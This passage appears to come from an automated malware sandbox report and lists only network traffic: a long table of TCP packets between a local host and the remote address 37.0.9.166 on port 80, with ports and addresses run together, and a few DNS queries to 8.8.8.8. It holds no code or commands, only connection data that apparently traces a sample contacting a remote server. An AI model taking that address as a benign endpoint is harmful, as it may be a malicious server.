                                                          Jan 14, 2022 10:23:23.589657068 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589682102 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589693069 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589701891 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589720964 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589737892 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589739084 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589756012 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589772940 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589776039 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589791059 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589808941 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589812040 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589827061 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589844942 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589847088 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589886904 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589905977 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589911938 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589941978 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.590023994 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.615863085 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.615902901 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.615959883 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.616614103 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616648912 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616700888 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616702080 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.616727114 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616746902 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616771936 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616796017 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616813898 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616841078 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616853952 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616878033 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616900921 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616925955 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616942883 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616961956 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.616986036 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617011070 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617034912 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617059946 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617084026 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617110014 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617136002 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617160082 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617183924 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617202044 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617228031 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617254972 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.617290020 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617338896 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617347002 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617353916 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617381096 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617419004 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617428064 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617513895 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617549896 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617558956 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617564917 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617569923 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.617574930 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.644192934 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.775901079 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.874783039 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.874993086 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:25.295875072 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.076983929 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.103903055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.104012012 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.105874062 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.134087086 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134126902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134172916 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134190083 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134215117 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134246111 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134268999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134290934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134300947 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.134316921 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134320974 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.134329081 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.134335041 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.134377956 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.134910107 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.160954952 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161024094 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161052942 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161073923 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161093950 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161119938 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161137104 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161140919 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161163092 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161171913 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161184072 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161205053 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161216974 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161226034 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161252975 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161325932 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161448002 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161472082 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161497116 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161518097 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161530972 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161578894 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161602974 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.161623955 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.161716938 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188004017 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188044071 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188056946 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188080072 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188122988 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188122988 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188138962 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188158035 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188170910 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188188076 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188260078 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188273907 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188278913 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188293934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188349009 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188499928 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188517094 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188529015 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188541889 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188569069 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188595057 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188631058 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188647985 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188666105 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188676119 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188715935 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188807011 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188852072 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188877106 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188903093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.188932896 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.188978910 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189116001 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189172029 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189184904 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189223051 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189245939 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189260006 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189276934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189300060 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189307928 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189459085 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189479113 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189500093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189512968 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189526081 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189551115 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189557076 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.189582109 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189594984 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.189651012 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214787006 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214819908 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214832067 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214854956 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214867115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214884996 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214896917 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214910984 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214912891 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214922905 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214937925 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214945078 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214952946 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.214952946 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214967966 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.214997053 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215003014 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215023041 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215037107 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215049982 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215061903 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215075016 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215087891 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215137959 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215189934 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215189934 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215197086 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215204000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215230942 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215244055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215256929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215260029 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215271950 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215286970 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215302944 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215317011 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215326071 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215332985 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215377092 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215415955 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.215430975 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215447903 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215461969 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215475082 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.215509892 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.216061115 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216089964 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216137886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.216150999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298652887 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298670053 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298691988 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298710108 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298718929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298742056 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298763037 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298775911 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298785925 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298809052 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298829079 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298830986 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298835993 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298860073 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298882961 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298906088 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298927069 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298930883 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298940897 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298949957 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298962116 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298973083 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299001932 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299019098 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299031019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299053907 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299076080 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299081087 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299098969 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299122095 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299139977 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299143076 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299166918 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299200058 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299216986 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299223900 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299235106 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299267054 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299272060 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299298048 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299328089 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299343109 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299350977 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299374104 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299396038 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299424887 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299441099 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299455881 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299472094 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299490929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299501896 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299508095 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299515963 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299539089 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299561024 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299591064 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299612999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299638033 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299654961 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299675941 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299678087 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299683094 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299686909 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299721956 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326488018 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326512098 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326529026 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326543093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326558113 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326572895 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326589108 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326600075 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326606035 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326617002 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326632023 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326646090 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326661110 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326662064 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326666117 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326677084 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326692104 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326706886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326720953 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326733112 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326738119 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326738119 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326755047 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326769114 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326771021 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326788902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326798916 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326813936 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326828003 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326831102 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326843977 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326858997 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326879025 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326900005 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326904058 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326915026 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326917887 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326931000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326950073 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326963902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326978922 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326992989 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327007055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327022076 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327033043 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327035904 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327038050 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327047110 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327061892 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327111959 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327153921 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.328083992 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.328100920 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:33.079349041 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:33.079515934 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:42.243078947 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:42.243217945 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:24:27.296951056 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:24:48.884532928 CET4917080192.168.2.2237.0.9.166

                                                          UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 10:23:17.920835972 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:17.952476025 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:22.426112890 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:22.446824074 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:23.372718096 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:23.440036058 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:26.991931915 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
